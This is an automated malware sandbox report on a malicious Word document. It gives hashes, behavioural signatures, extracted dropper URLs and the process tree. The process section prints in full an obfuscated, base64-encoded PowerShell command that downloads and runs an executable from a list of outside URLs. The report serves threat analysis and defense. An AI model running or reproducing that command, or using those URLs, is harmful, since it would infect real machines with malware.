Analysis

  • max time kernel
    129s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    01/08/2024, 23:01

General

  • Target

    821250bf34099b07ba82635ca9091e00_JaffaCakes118.doc

  • Size

    142KB

  • MD5

    821250bf34099b07ba82635ca9091e00

  • SHA1

    3aa7394e696cde485a859ea44d9ea50dc72cdfb1

  • SHA256

    e2f0ddc987ff0a9a79c926af6fdf767ec0c2c46220b5fc370d27a511567f0151

  • SHA512

    0339f37445b8e7d2e26d1e4311b9a1d93796aa0b1b75cfd8b2f5aba8f6e067025b4ee2b2a2ca0af5bf1e5d6c779f6ac14d0c4b6b8693041aab396dbc0808713a

  • SSDEEP

    1536:IBpHfa3BkRD3bNqfNpu39IId5a6XP3Mg8afmqbMxXOYgnJnIJe4SGOMKaK4/j:0R1qf69xak3Mgxm+Y0nae4sMKT6j

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ibccglobal.com/thankyou2/ARA/

exe.dropper

http://work.digitalvichar.com/1mv7clu/o/

exe.dropper

http://13.229.25.57/7xdfb/jpA/

exe.dropper

http://binarystationary.com/cgi-bin/5rM/

exe.dropper

http://fmcav.com/images/ZQF/

exe.dropper

https://kodiakheating.com/ldnha/ybI/

exe.dropper

https://khvs.vrfantasy.gallery/igiodbck/eXq/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\821250bf34099b07ba82635ca9091e00_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2072
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABTAGMAaAA0AHoAagAyAD0AKAAnAFoAXwAnACsAKAAnAHoAcgAnACsAJwBqADMAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAFIATwBmAGkAbABlAFwASQBjADQARQBHAFYAdQBcAEMAXwB6AFMAawA1AFgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAVQBgAFIAYABJAFQAeQBgAHAAUgBvAFQATwBDAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwArACcAMgAsACAAdAAnACkAKwAoACcAbAAnACsAJwBzADEAJwApACsAKAAnADEALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABJAHgAOAB4AHAAbgBxACAAPQAgACgAJwBCAHAAJwArACcANgAnACsAKAAnAHAANAB4ACcAKwAnAHAAawAnACkAKQA7ACQAUAA4AHAAcAB5AGYAdAA9ACgAKAAnAFIAOAAnACsAJwBuAGcAJwApACsAJwB5ACcAKwAnADYAZAAnACkAOwAkAFcAZgBvAF8AbwBkAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASQAnACsAJwBjADQAZQBnAHYAdQB7ADAAfQAnACsAJwBDAF8AegBzAGsANQB4AHsAJwArACcAMAB9ACcAKQAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAHgAOAB4AHAAbgBxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABCAGYAaAA3AGQAdQBtAD0AKAAoACcARAAnACsAJwBxADcAJwApACsAKAAnADAAaAAnACsAJwBwAGMAJwApACkAOwAkAFUAcgB5AGIAMABkAGkAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AVwBFAEIAQwBMAGkAZQBuAHQAOwAkAFcAZQBwAGIAZABmAG8APQAoACgAJwBoACcAKwAnAHQAJwArACcAdABwADoALwAnACkAKwAoACcALwBpACcAKwAnAGIAJwApACsAKAAnAGMAYwBnAGwAbwBiACcAKwAnAGEAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAHQAaABhAG4AawB5AG8AJwArACcAdQAyAC8AQQBSACcAKQArACcAQQAvACcAKwAoACcAKgAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvACcAKQArACgAJwB3AG8AJwArACcAcgAnACkAKwAoACcAawAuAGQAJwArACcAaQBnACcAKQArACgAJwBpAHQAJwArACcAYQAnACsAJwBsAHYAaQBjAGgAYQByACcAKQArACgAJwAuAGMAJwArACcAbwBtAC8AMQBtAHYAJwApACsAKAAnADcAYwBsAHUAJwArACcALwAnACkAKwAoACcAbwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwAnACsAJwAxADMAJwArACcALgAyACcAKwAnADIAJwApACsAKAAnADkAJwArACcALgAyACcAKwAnADUALgA1ADcALwA3AHgAZABmAGIALwBqACcAKwAnAHAAQQAvACcAKwAnACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAOgAvACcAKwAnAC8AYgBpACcAKwAnAG4AYQByAHkAcwB0AGEAdABpAG8AJwApACsAJwBuACcAKwAnAGEAJwArACcAcgB5ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAtACcAKwAnAGIAaQBuAC8ANQAnACkAKwAoACcAcgAnACsAJwBNAC8AKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAJwArACgAJwA6AC8AJwArACcALwBmACcAKQArACgAJwBtAGMAJwArACcAYQAnACkAKwAoACcAdgAuAGMAbwAnACsAJwBtAC8AaQBtAGEAZwAnACsAJwBlAHMAJwArACcALwAnACsAJwBaAFEAJwArACcARgAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAcwA6ACcAKwAnAC8ALwBrAG8AZABpAGEAawBoAGUAJwArACcAYQAnACkAKwAoACcAdABpACcAKwAnAG4AZwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGwAJwArACcAZABuACcAKQArACgAJwBoAGEAJwArACcALwAnACkAKwAoACcAeQBiACcAKwAnAEkALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAAnACsAJwBzADoALwAvACcAKwAnAGsAaAB2ACcAKQArACgAJwBzAC4AdgByAGYAYQBuACcAKwAnAHQAYQBzAHkAJwArACcALgAnACsAJwBnAGEAbAAnACkAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAvAGkAJwArACcAZwBpACcAKQArACgAJwBvAGQAJwArACcAYgBjAGsAJwApACsAKAAnAC8AZQBYAHEAJwArACcALwAnACkAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABYAGgAZABuAG0AbQBsAD0AKAAoACcARQByAHUAJwArACcANgB4ACcAKQArACcAbgAnACsAJwBwACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAcwAwAGgAcwB2ADIAIABpAG4AIAAkAFcAZQBwAGIAZABmAG8AKQB7AHQAcgB5AHsAJABVAHIAeQBiADAAZABpAC4AIgBEAG8AYABXAGAATgBsAE8AYQBEAGAARgBpAGwARQAiACgAJABYAHMAMABoAHMAdgAyACwAIAAkAFcAZgBvAF8AbwBkAGYAKQA7ACQAVQBlADIAcwBoAG8AcwA9ACgAKAAnAE8AcQBqACcAKwAnAGkAJwApACsAKAAnAGsAJwArACcAdQAzACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFcAZgBvAF8AbwBkAGYAKQAuACIATABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANQA1ADcAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABXAGYAbwBfAG8AZABmACkAOwAkAFMAagBxADIAMgBfADEAPQAoACcASgAxACcAKwAoACcAdwBfAHMAJwArACcAbQAzACcAKQApADsAYgByAGUAYQBrADsAJABJAGgAZAB5AHYAcQB0AD0AKAAoACcAQgA0ACcAKwAnADgAJwApACsAKAAnAGMAJwArACcAZAB1AHgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAYQA5AGUAMAA0AGIAPQAoACcAQQB5ACcAKwAoACcANgB6ACcAKwAnADgAJwApACsAJwBiAGMAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2640

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            19KB

            MD5

            00c617d46db20d27d819ee598a5d2193

            SHA1

            e0e402cd8c28ba6d09b4d44efc383deb8b78a2e0

            SHA256

            9b2cb04882fae03f7e25435bab331bd828473f82a88598131c0e6ea8f7e27641

            SHA512

            b65e2ebb182a2c6670f055bf1c95f82c3b5baf6f5ea0793fb826d765ad027c603f171ac19845101a8139fceef17ad71fb4d0585c9d9fb89d74e82e3a9a2e97c3

          • memory/1656-44-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/1656-43-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/1656-5-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/1656-0-0x000000002FB71000-0x000000002FB72000-memory.dmp

            Filesize

            4KB

          • memory/1656-7-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/1656-26-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/1656-28-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/1656-27-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/1656-2-0x000000007110D000-0x0000000071118000-memory.dmp

            Filesize

            44KB

          • memory/1656-45-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/1656-6-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/1656-78-0x000000007110D000-0x0000000071118000-memory.dmp

            Filesize

            44KB

          • memory/1656-77-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1656-57-0x000000007110D000-0x0000000071118000-memory.dmp

            Filesize

            44KB

          • memory/1656-58-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/1656-59-0x0000000005620000-0x0000000005720000-memory.dmp

            Filesize

            1024KB

          • memory/1656-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2640-52-0x00000000023A0000-0x00000000023A8000-memory.dmp

            Filesize

            32KB

          • memory/2640-51-0x000000001B3A0000-0x000000001B682000-memory.dmp

            Filesize

            2.9MB